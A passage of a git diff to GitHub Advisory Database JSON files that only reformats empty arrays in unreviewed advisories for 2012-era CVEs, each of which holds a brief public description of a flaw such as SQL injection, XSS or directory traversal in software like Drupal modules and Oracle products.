a/advisories/unreviewed/2022/05/GHSA-67ww-jmxf-h84x/GHSA-67ww-jmxf-h84x.json +++ b/advisories/unreviewed/2022/05/GHSA-67ww-jmxf-h84x/GHSA-67ww-jmxf-h84x.json @@ -7,12 +7,8 @@ "CVE-2012-1226" ], "details": "Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-685w-7fmq-g82p/GHSA-685w-7fmq-g82p.json b/advisories/unreviewed/2022/05/GHSA-685w-7fmq-g82p/GHSA-685w-7fmq-g82p.json index a8169b504e8..b15266d829a 100644 --- a/advisories/unreviewed/2022/05/GHSA-685w-7fmq-g82p/GHSA-685w-7fmq-g82p.json +++ b/advisories/unreviewed/2022/05/GHSA-685w-7fmq-g82p/GHSA-685w-7fmq-g82p.json @@ -7,12 +7,8 @@ "CVE-2012-1733" ], "details": "Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect confidentiality via unknown vectors related to CM.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-689j-26wf-j42h/GHSA-689j-26wf-j42h.json b/advisories/unreviewed/2022/05/GHSA-689j-26wf-j42h/GHSA-689j-26wf-j42h.json index f09950897e6..beaaee062be 100644 --- a/advisories/unreviewed/2022/05/GHSA-689j-26wf-j42h/GHSA-689j-26wf-j42h.json +++ b/advisories/unreviewed/2022/05/GHSA-689j-26wf-j42h/GHSA-689j-26wf-j42h.json @@ -7,12 +7,8 @@ "CVE-2012-3820" ], "details": "Multiple SQL injection vulnerabilities in Campaign11.exe in Arial Software Campaign Enterprise before 11.0.551 allow remote attackers to execute arbitrary SQL commands via the (1) SerialNumber field to activate.asp or (2) UID field to User-Edit.asp.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-68xm-h8w8-4r93/GHSA-68xm-h8w8-4r93.json b/advisories/unreviewed/2022/05/GHSA-68xm-h8w8-4r93/GHSA-68xm-h8w8-4r93.json index 4a1a610d20f..00039bed6ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-68xm-h8w8-4r93/GHSA-68xm-h8w8-4r93.json +++ b/advisories/unreviewed/2022/05/GHSA-68xm-h8w8-4r93/GHSA-68xm-h8w8-4r93.json @@ -7,12 +7,8 @@ "CVE-2012-3114" ], "details": "Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 5.5.06, 6.0, 6.1, and 6.2 allows remote attackers to affect integrity via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-69cf-fghj-vwjc/GHSA-69cf-fghj-vwjc.json b/advisories/unreviewed/2022/05/GHSA-69cf-fghj-vwjc/GHSA-69cf-fghj-vwjc.json index bcb762999b3..84a0b189541 100644 --- a/advisories/unreviewed/2022/05/GHSA-69cf-fghj-vwjc/GHSA-69cf-fghj-vwjc.json +++ b/advisories/unreviewed/2022/05/GHSA-69cf-fghj-vwjc/GHSA-69cf-fghj-vwjc.json @@ -7,12 +7,8 @@ "CVE-2012-2067" ], "details": "Unspecified vulnerability in the CKeditor module 6.x-2.x before 6.x-2.3 and the CKEditor module 6.x-1.x before 6.x-1.9 and 7.x-1.x before 7.x-1.7 for Drupal, when the core PHP module is enabled, allows remote authenticated users or remote attackers to execute arbitrary PHP code via the text parameter to a text filter. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6cjr-78qx-g328/GHSA-6cjr-78qx-g328.json b/advisories/unreviewed/2022/05/GHSA-6cjr-78qx-g328/GHSA-6cjr-78qx-g328.json index 5c223a950b7..9a87793984b 100644 --- a/advisories/unreviewed/2022/05/GHSA-6cjr-78qx-g328/GHSA-6cjr-78qx-g328.json +++ b/advisories/unreviewed/2022/05/GHSA-6cjr-78qx-g328/GHSA-6cjr-78qx-g328.json @@ -7,12 +7,8 @@ "CVE-2012-3746" ], "details": "UIWebView in UIKit in Apple iOS before 6 does not properly use the Data Protection feature, which allows context-dependent attackers to obtain cleartext file content by leveraging direct access to a device's filesystem.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6cxx-fm4f-4mx5/GHSA-6cxx-fm4f-4mx5.json b/advisories/unreviewed/2022/05/GHSA-6cxx-fm4f-4mx5/GHSA-6cxx-fm4f-4mx5.json index 4e3b62632b2..875578b81e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-6cxx-fm4f-4mx5/GHSA-6cxx-fm4f-4mx5.json +++ b/advisories/unreviewed/2022/05/GHSA-6cxx-fm4f-4mx5/GHSA-6cxx-fm4f-4mx5.json @@ -7,12 +7,8 @@ "CVE-2012-1628" ], "details": "Cross-site scripting (XSS) vulnerability in the SuperCron module for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6f3j-w43m-66x8/GHSA-6f3j-w43m-66x8.json b/advisories/unreviewed/2022/05/GHSA-6f3j-w43m-66x8/GHSA-6f3j-w43m-66x8.json index cb87ba4642b..6aa52b2ca61 100644 --- a/advisories/unreviewed/2022/05/GHSA-6f3j-w43m-66x8/GHSA-6f3j-w43m-66x8.json +++ b/advisories/unreviewed/2022/05/GHSA-6f3j-w43m-66x8/GHSA-6f3j-w43m-66x8.json @@ -7,12 +7,8 @@ "CVE-2012-1672" ], "details": "SQL injection vulnerability in getcity.php in Hotel Booking Portal 0.1 allows remote attackers to execute arbitrary SQL commands via the country parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6fph-4gc5-4w2m/GHSA-6fph-4gc5-4w2m.json b/advisories/unreviewed/2022/05/GHSA-6fph-4gc5-4w2m/GHSA-6fph-4gc5-4w2m.json index 6663006a885..bafa021c85b 100644 --- a/advisories/unreviewed/2022/05/GHSA-6fph-4gc5-4w2m/GHSA-6fph-4gc5-4w2m.json +++ b/advisories/unreviewed/2022/05/GHSA-6fph-4gc5-4w2m/GHSA-6fph-4gc5-4w2m.json @@ -7,12 +7,8 @@ "CVE-2012-3830" ], "details": "Cross-site scripting (XSS) vulnerability in decoda/templates/video.php in Decoda before 3.3.3 allows remote attackers to inject arbitrary web script or HTML via the video directive.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6fq3-6244-j925/GHSA-6fq3-6244-j925.json b/advisories/unreviewed/2022/05/GHSA-6fq3-6244-j925/GHSA-6fq3-6244-j925.json index 0256b8b1db3..f33aa8808fc 100644 --- a/advisories/unreviewed/2022/05/GHSA-6fq3-6244-j925/GHSA-6fq3-6244-j925.json +++ b/advisories/unreviewed/2022/05/GHSA-6fq3-6244-j925/GHSA-6fq3-6244-j925.json @@ -7,12 +7,8 @@ "CVE-2012-1066" ], "details": "Cross-site scripting (XSS) vulnerability in the template module in SmartyCMS 0.9.4 allows remote attackers to inject arbitrary web script or HTML via the title bar.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6fvv-pmpx-fp4w/GHSA-6fvv-pmpx-fp4w.json b/advisories/unreviewed/2022/05/GHSA-6fvv-pmpx-fp4w/GHSA-6fvv-pmpx-fp4w.json index 5ad2ddfc194..fd88ea72653 100644 --- a/advisories/unreviewed/2022/05/GHSA-6fvv-pmpx-fp4w/GHSA-6fvv-pmpx-fp4w.json +++ b/advisories/unreviewed/2022/05/GHSA-6fvv-pmpx-fp4w/GHSA-6fvv-pmpx-fp4w.json @@ -7,12 +7,8 @@ "CVE-2012-0761" ], "details": "The Shockwave 3D Asset component in Adobe Shockwave Player before 11.6.4.634 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0757, CVE-2012-0760, CVE-2012-0762, CVE-2012-0763, CVE-2012-0764, and CVE-2012-0766.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6gr3-vr3v-86j3/GHSA-6gr3-vr3v-86j3.json b/advisories/unreviewed/2022/05/GHSA-6gr3-vr3v-86j3/GHSA-6gr3-vr3v-86j3.json index bafd24a73b2..27882b7fbbb 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gr3-vr3v-86j3/GHSA-6gr3-vr3v-86j3.json +++ b/advisories/unreviewed/2022/05/GHSA-6gr3-vr3v-86j3/GHSA-6gr3-vr3v-86j3.json @@ -7,12 +7,8 @@ "CVE-2012-2769" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the topic administration page in the Extension::MobileUI extension before 1.02 for Best Practical Solutions RT 3.8.x and in Best Practical Solutions RT before 4.0.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6hm5-6qgh-43cp/GHSA-6hm5-6qgh-43cp.json b/advisories/unreviewed/2022/05/GHSA-6hm5-6qgh-43cp/GHSA-6hm5-6qgh-43cp.json index ceea3555c81..fe1102a9301 100644 --- a/advisories/unreviewed/2022/05/GHSA-6hm5-6qgh-43cp/GHSA-6hm5-6qgh-43cp.json +++ b/advisories/unreviewed/2022/05/GHSA-6hm5-6qgh-43cp/GHSA-6hm5-6qgh-43cp.json @@ -7,12 +7,8 @@ "CVE-2012-1514" ], "details": "Cross-site request forgery (CSRF) vulnerability in VMware vShield Manager (vSM) 1.0.1 before Update 2 and 4.1.0 before Update 2 allows remote attackers to hijack the authentication of arbitrary users.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6j3w-mmjm-hjmc/GHSA-6j3w-mmjm-hjmc.json b/advisories/unreviewed/2022/05/GHSA-6j3w-mmjm-hjmc/GHSA-6j3w-mmjm-hjmc.json index 0c01a809788..04324151a2e 100644 --- a/advisories/unreviewed/2022/05/GHSA-6j3w-mmjm-hjmc/GHSA-6j3w-mmjm-hjmc.json +++ b/advisories/unreviewed/2022/05/GHSA-6j3w-mmjm-hjmc/GHSA-6j3w-mmjm-hjmc.json @@ -7,12 +7,8 @@ "CVE-2012-3840" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in index.php/users/form/user_id in MyClientBase 0.12 allow remote attackers to inject arbitrary web script or HTML via the (1) first_name or (2) last_name parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6jcp-w5qc-vw4v/GHSA-6jcp-w5qc-vw4v.json b/advisories/unreviewed/2022/05/GHSA-6jcp-w5qc-vw4v/GHSA-6jcp-w5qc-vw4v.json index 3910e6c96b6..ad5bd26a3a4 100644 --- a/advisories/unreviewed/2022/05/GHSA-6jcp-w5qc-vw4v/GHSA-6jcp-w5qc-vw4v.json +++ b/advisories/unreviewed/2022/05/GHSA-6jcp-w5qc-vw4v/GHSA-6jcp-w5qc-vw4v.json @@ -7,12 +7,8 @@ "CVE-2012-2117" ], "details": "Cross-site scripting (XSS) vulnerability in the Gigya - Social optimization module 6.x before 6.x-3.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6jfg-6x32-98jf/GHSA-6jfg-6x32-98jf.json b/advisories/unreviewed/2022/05/GHSA-6jfg-6x32-98jf/GHSA-6jfg-6x32-98jf.json index b5fc9ba964a..7a755248779 100644 --- a/advisories/unreviewed/2022/05/GHSA-6jfg-6x32-98jf/GHSA-6jfg-6x32-98jf.json +++ b/advisories/unreviewed/2022/05/GHSA-6jfg-6x32-98jf/GHSA-6jfg-6x32-98jf.json @@ -7,12 +7,8 @@ "CVE-2011-5167" ], "details": "Heap-based buffer overflow in the SetDevNames method of the Tidestone Formula One ActiveX control (TTF16.ocx) 6.3.5 Build 1 in Oracle Hyperion Strategic Finance 12.x and possibly earlier allows remote attackers to execute arbitrary code via a long string to the DriverName parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6mc3-64r4-75hq/GHSA-6mc3-64r4-75hq.json b/advisories/unreviewed/2022/05/GHSA-6mc3-64r4-75hq/GHSA-6mc3-64r4-75hq.json index 6f438ad7f5d..a57cb9c7fee 100644 --- a/advisories/unreviewed/2022/05/GHSA-6mc3-64r4-75hq/GHSA-6mc3-64r4-75hq.json +++ b/advisories/unreviewed/2022/05/GHSA-6mc3-64r4-75hq/GHSA-6mc3-64r4-75hq.json @@ -7,12 +7,8 @@ "CVE-2012-1659" ], "details": "Cross-site scripting (XSS) vulnerability in the Node Recommendation module 6.x-1.x before 6.x-1.1 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6p48-jg39-2mq7/GHSA-6p48-jg39-2mq7.json b/advisories/unreviewed/2022/05/GHSA-6p48-jg39-2mq7/GHSA-6p48-jg39-2mq7.json index 63192784d52..bade0455650 100644 --- a/advisories/unreviewed/2022/05/GHSA-6p48-jg39-2mq7/GHSA-6p48-jg39-2mq7.json +++ b/advisories/unreviewed/2022/05/GHSA-6p48-jg39-2mq7/GHSA-6p48-jg39-2mq7.json @@ -7,12 +7,8 @@ "CVE-2012-3494" ], "details": "The set_debugreg hypercall in include/asm-x86/debugreg.h in Xen 4.0, 4.1, and 4.2, and Citrix XenServer 6.0.2 and earlier, when running on x86-64 systems, allows local OS guest users to cause a denial of service (host crash) by writing to the reserved bits of the DR7 debug control register.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -120,9 +116,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6p9j-c36f-hqcr/GHSA-6p9j-c36f-hqcr.json b/advisories/unreviewed/2022/05/GHSA-6p9j-c36f-hqcr/GHSA-6p9j-c36f-hqcr.json index 34dd87debd1..99823e70ce1 100644 --- a/advisories/unreviewed/2022/05/GHSA-6p9j-c36f-hqcr/GHSA-6p9j-c36f-hqcr.json +++ b/advisories/unreviewed/2022/05/GHSA-6p9j-c36f-hqcr/GHSA-6p9j-c36f-hqcr.json @@ -7,12 +7,8 @@ "CVE-2011-5235" ], "details": "SQL injection vulnerability in mnoGoSearch before 3.3.12 allows remote attackers to execute arbitrary SQL commands via the hostname in a hypertext link.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6pm2-hwq9-c8rw/GHSA-6pm2-hwq9-c8rw.json b/advisories/unreviewed/2022/05/GHSA-6pm2-hwq9-c8rw/GHSA-6pm2-hwq9-c8rw.json index 12345440e7f..aece84c9efd 100644 --- a/advisories/unreviewed/2022/05/GHSA-6pm2-hwq9-c8rw/GHSA-6pm2-hwq9-c8rw.json +++ b/advisories/unreviewed/2022/05/GHSA-6pm2-hwq9-c8rw/GHSA-6pm2-hwq9-c8rw.json @@ -7,12 +7,8 @@ "CVE-2012-0922" ], "details": "rvrender.dll in RealNetworks RealPlayer 11.x, 14.x, and 15.x before 15.02.71, and RealPlayer SP 1.0 through 1.1.5, allows remote attackers to execute arbitrary code via crafted flags in an RMFF file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6pm3-7hqj-9f4c/GHSA-6pm3-7hqj-9f4c.json b/advisories/unreviewed/2022/05/GHSA-6pm3-7hqj-9f4c/GHSA-6pm3-7hqj-9f4c.json index 7d1f7ca298f..fdd0f383510 100644 --- a/advisories/unreviewed/2022/05/GHSA-6pm3-7hqj-9f4c/GHSA-6pm3-7hqj-9f4c.json +++ b/advisories/unreviewed/2022/05/GHSA-6pm3-7hqj-9f4c/GHSA-6pm3-7hqj-9f4c.json @@ -7,12 +7,8 @@ "CVE-2012-1933" ], "details": "Multiple PHP remote file inclusion vulnerabilities in Newscoop 3.5.x before 3.5.5 and 4 before RC4, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[g_campsiteDir] parameter to (1) include/phorum_load.php, (2) conf/install_conf.php, or (3) conf/liveuser_configuration.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6pv3-9mxc-r3vx/GHSA-6pv3-9mxc-r3vx.json b/advisories/unreviewed/2022/05/GHSA-6pv3-9mxc-r3vx/GHSA-6pv3-9mxc-r3vx.json index f33c6c71996..d96221b6a3e 100644 --- a/advisories/unreviewed/2022/05/GHSA-6pv3-9mxc-r3vx/GHSA-6pv3-9mxc-r3vx.json +++ b/advisories/unreviewed/2022/05/GHSA-6pv3-9mxc-r3vx/GHSA-6pv3-9mxc-r3vx.json @@ -7,12 +7,8 @@ "CVE-2012-1003" ], "details": "Multiple integer overflows in Opera 11.60 and earlier allow remote attackers to cause a denial of service (application crash) via a large integer argument to the (1) Int32Array, (2) Float32Array, (3) Float64Array, (4) Uint32Array, (5) Int16Array, or (6) ArrayBuffer function. NOTE: the vendor reportedly characterizes this as \"a stability issue, not a security issue.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6rcj-49pw-rg3x/GHSA-6rcj-49pw-rg3x.json b/advisories/unreviewed/2022/05/GHSA-6rcj-49pw-rg3x/GHSA-6rcj-49pw-rg3x.json index f5c9f8722ad..903f6493315 100644 --- a/advisories/unreviewed/2022/05/GHSA-6rcj-49pw-rg3x/GHSA-6rcj-49pw-rg3x.json +++ b/advisories/unreviewed/2022/05/GHSA-6rcj-49pw-rg3x/GHSA-6rcj-49pw-rg3x.json @@ -7,12 +7,8 @@ "CVE-2012-2718" ], "details": "SQL injection vulnerability in the Counter module for Drupal allows remote attackers to execute arbitrary SQL commands via unspecified vectors related to \"recording visits.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6vc4-967q-qmcm/GHSA-6vc4-967q-qmcm.json b/advisories/unreviewed/2022/05/GHSA-6vc4-967q-qmcm/GHSA-6vc4-967q-qmcm.json index b9e7766bb5d..9be381244ae 100644 --- a/advisories/unreviewed/2022/05/GHSA-6vc4-967q-qmcm/GHSA-6vc4-967q-qmcm.json +++ b/advisories/unreviewed/2022/05/GHSA-6vc4-967q-qmcm/GHSA-6vc4-967q-qmcm.json @@ -7,12 +7,8 @@ "CVE-2012-2168" ], "details": "IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 allows remote authenticated users to obtain sensitive stack-trace information from CM server error messages via an invalid parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6wxq-55hv-69gm/GHSA-6wxq-55hv-69gm.json b/advisories/unreviewed/2022/05/GHSA-6wxq-55hv-69gm/GHSA-6wxq-55hv-69gm.json index c4bb1bb18f0..8582f39f504 100644 --- a/advisories/unreviewed/2022/05/GHSA-6wxq-55hv-69gm/GHSA-6wxq-55hv-69gm.json +++ b/advisories/unreviewed/2022/05/GHSA-6wxq-55hv-69gm/GHSA-6wxq-55hv-69gm.json @@ -7,12 +7,8 @@ "CVE-2012-1760" ], "details": "Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect availability via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1742.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6x3x-v7pj-7967/GHSA-6x3x-v7pj-7967.json b/advisories/unreviewed/2022/05/GHSA-6x3x-v7pj-7967/GHSA-6x3x-v7pj-7967.json index ab031ee0dbd..e145a102cd3 100644 --- a/advisories/unreviewed/2022/05/GHSA-6x3x-v7pj-7967/GHSA-6x3x-v7pj-7967.json +++ b/advisories/unreviewed/2022/05/GHSA-6x3x-v7pj-7967/GHSA-6x3x-v7pj-7967.json @@ -7,12 +7,8 @@ "CVE-2012-1466" ], "details": "The Traffic Grapher Server for NetMechanica NetDecision before 4.6.1 allows remote attackers to obtain the source code of NtDecision script files with a .nd extension via an invalid version number in an HTTP request, as demonstrated using default.nd. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6x4j-7vp6-mhr5/GHSA-6x4j-7vp6-mhr5.json b/advisories/unreviewed/2022/05/GHSA-6x4j-7vp6-mhr5/GHSA-6x4j-7vp6-mhr5.json index 5eeaf35f0be..6406b5daf6f 100644 --- a/advisories/unreviewed/2022/05/GHSA-6x4j-7vp6-mhr5/GHSA-6x4j-7vp6-mhr5.json +++ b/advisories/unreviewed/2022/05/GHSA-6x4j-7vp6-mhr5/GHSA-6x4j-7vp6-mhr5.json @@ -7,12 +7,8 @@ "CVE-2012-3915" ], "details": "The DMVPN tunnel implementation in Cisco IOS 15.2 allows remote attackers to cause a denial of service (persistent IKE state) via a large volume of hub-to-spoke traffic, aka Bug ID CSCtq39602.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6x4p-xfh8-hfpg/GHSA-6x4p-xfh8-hfpg.json b/advisories/unreviewed/2022/05/GHSA-6x4p-xfh8-hfpg/GHSA-6x4p-xfh8-hfpg.json index 0539d9dc564..d63f7b9218b 100644 --- a/advisories/unreviewed/2022/05/GHSA-6x4p-xfh8-hfpg/GHSA-6x4p-xfh8-hfpg.json +++ b/advisories/unreviewed/2022/05/GHSA-6x4p-xfh8-hfpg/GHSA-6x4p-xfh8-hfpg.json @@ -7,12 +7,8 @@ "CVE-2012-1911" ], "details": "Multiple SQL injection vulnerabilities in PHP Address Book 6.2.12 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) to_group parameter to group.php or (2) id parameter to vcard.php. NOTE: the edit.php vector is already covered by CVE-2008-2565.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6x8h-r754-qv46/GHSA-6x8h-r754-qv46.json b/advisories/unreviewed/2022/05/GHSA-6x8h-r754-qv46/GHSA-6x8h-r754-qv46.json index f01077aab58..b8832bbe71e 100644 --- a/advisories/unreviewed/2022/05/GHSA-6x8h-r754-qv46/GHSA-6x8h-r754-qv46.json +++ b/advisories/unreviewed/2022/05/GHSA-6x8h-r754-qv46/GHSA-6x8h-r754-qv46.json @@ -7,12 +7,8 @@ "CVE-2012-3715" ], "details": "Apple Safari before 6.0.1 makes http requests for https URIs in certain circumstances involving a paste into the address bar, which allows user-assisted remote attackers to obtain sensitive information by sniffing the network.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-72c4-8fq6-q36h/GHSA-72c4-8fq6-q36h.json b/advisories/unreviewed/2022/05/GHSA-72c4-8fq6-q36h/GHSA-72c4-8fq6-q36h.json index a7f4d29c131..c5f5bbea82a 100644 --- a/advisories/unreviewed/2022/05/GHSA-72c4-8fq6-q36h/GHSA-72c4-8fq6-q36h.json +++ b/advisories/unreviewed/2022/05/GHSA-72c4-8fq6-q36h/GHSA-72c4-8fq6-q36h.json @@ -7,12 +7,8 @@ "CVE-2012-3725" ], "details": "The DNAv4 protocol implementation in the DHCP component in Apple iOS before 6 sends Wi-Fi packets containing a MAC address of a host on a previously used network, which might allow remote attackers to obtain sensitive information about previous device locations by sniffing an unencrypted Wi-Fi network for these packets.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-72fr-c7pw-pqmv/GHSA-72fr-c7pw-pqmv.json b/advisories/unreviewed/2022/05/GHSA-72fr-c7pw-pqmv/GHSA-72fr-c7pw-pqmv.json index a06ae353587..5c85689050c 100644 --- a/advisories/unreviewed/2022/05/GHSA-72fr-c7pw-pqmv/GHSA-72fr-c7pw-pqmv.json +++ b/advisories/unreviewed/2022/05/GHSA-72fr-c7pw-pqmv/GHSA-72fr-c7pw-pqmv.json @@ -7,12 +7,8 @@ "CVE-2012-1657" ], "details": "Cross-site scripting (XSS) vulnerability in block_class.module in the Block Class module before 7.x-1.1 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via the class name.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-74f9-jmf7-mh4c/GHSA-74f9-jmf7-mh4c.json b/advisories/unreviewed/2022/05/GHSA-74f9-jmf7-mh4c/GHSA-74f9-jmf7-mh4c.json index 37f6b272661..0e394666b23 100644 --- a/advisories/unreviewed/2022/05/GHSA-74f9-jmf7-mh4c/GHSA-74f9-jmf7-mh4c.json +++ b/advisories/unreviewed/2022/05/GHSA-74f9-jmf7-mh4c/GHSA-74f9-jmf7-mh4c.json @@ -7,12 +7,8 @@ "CVE-2012-2174" ], "details": "The URL handler in IBM Lotus Notes 8.x before 8.5.3 FP2 allows remote attackers to execute arbitrary code via a crafted notes:// URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-754f-5xqj-fwmv/GHSA-754f-5xqj-fwmv.json b/advisories/unreviewed/2022/05/GHSA-754f-5xqj-fwmv/GHSA-754f-5xqj-fwmv.json index 59316123392..13c553b506e 100644 --- a/advisories/unreviewed/2022/05/GHSA-754f-5xqj-fwmv/GHSA-754f-5xqj-fwmv.json +++ b/advisories/unreviewed/2022/05/GHSA-754f-5xqj-fwmv/GHSA-754f-5xqj-fwmv.json @@ -7,12 +7,8 @@ "CVE-2012-3794" ], "details": "Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in Pro-face Pro-Server EX 1.30.000 and earlier, allows remote attackers to cause a denial of service (unhandled exception and daemon crash) via a crafted packet with a certain opcode that triggers an invalid attempt to allocate a large amount of memory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-764x-f594-rv3g/GHSA-764x-f594-rv3g.json b/advisories/unreviewed/2022/05/GHSA-764x-f594-rv3g/GHSA-764x-f594-rv3g.json index ad8faf9c155..c3bddcdcb0d 100644 --- a/advisories/unreviewed/2022/05/GHSA-764x-f594-rv3g/GHSA-764x-f594-rv3g.json +++ 